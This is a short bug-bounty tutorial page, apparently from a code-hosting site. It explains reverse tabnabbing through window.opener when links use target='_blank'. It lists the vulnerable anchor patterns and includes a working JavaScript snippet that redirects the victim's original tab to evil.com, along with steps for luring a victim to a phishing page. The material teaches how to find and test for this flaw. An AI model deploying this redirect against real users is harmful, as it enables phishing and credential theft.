crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Files
🤬
master
ROOT /
Misc /
Tabnabbing.md
27 lines | ISO-8859-1 | 969 bytes

Tabnabbing

Introduction

When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.

How to find

<a href="..." target="_blank" rel="" />  

<a href="..." target="_blank" />

How to Exploit

  1. Attacker posts a link to a website under his control that contains the following JS code: 
    <html>
<script>
if (window.opener) window.opener.parent.location.replace('http://evil.com');
if (window.parent != window) window.parent.location.replace('http://evil.com');
</script>
</html>
  2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
  3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.

References

Please wait...
Page is in error, reload to recover